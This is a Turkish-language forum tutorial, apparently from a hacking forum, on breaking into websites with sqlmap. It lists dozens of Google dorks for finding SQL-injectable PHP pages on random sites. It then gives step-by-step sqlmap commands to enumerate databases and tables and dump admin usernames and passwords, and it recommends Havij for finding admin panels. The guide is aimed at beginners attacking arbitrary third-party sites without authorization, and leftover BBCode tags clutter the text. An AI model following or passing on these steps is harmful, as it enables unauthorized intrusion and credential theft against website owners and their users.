SQLMAP İle Site Hack Etme
Merhaba Hocalarım ve Saygıdeğer Dostlarım Bu Konumda Sizlere SqlMap
İle Sql Açıklı Siteler Nasıl Hacklenir Ondan Bahsedicem.
Sql Açıklı Site Bulma
Sql Açıklı site bulmak için 1 adet dork'a İhtiyacımız Var Sizin İçin Buraya Dosrk Bırakıyorum.
Arasından bir dork seçtikten sonra google da aratıyoruz ve gelen sitelere teker teker girerek URL'nin sonuna ( " ya da ' ) Koyuyoruz ve bize hata veren sitelerde sql açığı olabilir demektir. Kesin olarak var diyemeyiz ama SqlMap ile Kesin Bilgi Alabiliriz.
Kod:
inurl:gallery.php?id=[/SIZE][/COLOR][/I][/B][/CENTER][/SIZE][/COLOR][/I][/B][/CENTER]
[B][I][COLOR=rgb(26, 188, 156)][SIZE=4][CENTER][B][I][COLOR=rgb(26, 188, 156)][SIZE=4]
[CENTER]inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
SqlMap İle Site Hack
1- Terminali açıyoruz
2- Bulduğumuz açıklı site linkini kaybetmeyin
3-
Kod:
sqlmap -u (açıklı site url) --dbs4- Bu Komutu ENTER' liyoruz bu komut ile Sitemizin DataBase İsmini Öğrenicez.
5- Önümüze Gelen [Y/N] Sorularının Hepsine " Y " Diyoruz.
6- Önümüze Bu Şekilde DataBase'ler Gelicek Bizim Kullanacağımız " information_schema " Değil!!
Üstünde yada altında ne yazıyorsa onu kullanıcaz.
7- Database'deki Tabloları Çekicez Şimdi.
Kod:
sqlmap -u (Açıklı Site) -D (Database Adı) --table
8- Bu adımdan sonra tablolar sıralanmaya başlayacak. Bu tabloların arasında admin - login - adminlogin - superadmin - user - uselogin Gibi tablolar oluyor biz bu tabloları kullanıcazki admin paneli şifresini bulalım bu sitede aşağıdaki resimdeki gibi admin tablosu var biz onu kullanıcaz.
Kod:
sqlmap -u (Açıklı Site) -D (Database adı) -T (Tablo ado örn; admin) --column[/COLOR][/I][/B][/CENTER][/COLOR][/I][/B][/CENTER]
[B][I][COLOR=rgb(26, 188, 156)][CENTER][B][I][COLOR=rgb(26, 188, 156)]
[CENTER]9- Bu kodu yazıyoruz ve açıklı sitenin databaseindeki admin tablosunu açıyoruz.
10- Önümüze tablonun içeriği çıkıyor mesela alttaki resimde verdiğim gibi admin tablosunun içinde id,identifiant,nom ve password kolonları var şimdi bu kolonları çıkarıp admin şifrelerini öğrenicez.
Kod:
sqlmap -u (Açıklı Site) -D (Database Adı) -T admin -C (Kolon İsimleri) --dump
11- Aşağıdaki resimdeki gibi admin bilgileri artık elimizde admin paneli bulmak için Havij 1.16 Uygulamasını İndirip FindAdmin Kısmından admin panelini bulabilirsiniz.
Evet bu konumdan bu kadardı umarım güzel olmuştur aşağıda bir video bırakıcam ordanda yardım alabilirsiniz oda alternatif bir sqlmap kullanımıdır.
No: sqlmap sadece linux'ta değil windowstada kullanılabiliyor.
Konuyu Kendim Yazdım Fakat Görseller Alıntıdır.
Moderasyon Ekibi Gururla Sunar...
Yeni başlayan arkadaşlarımız için rehber niteliğinde.
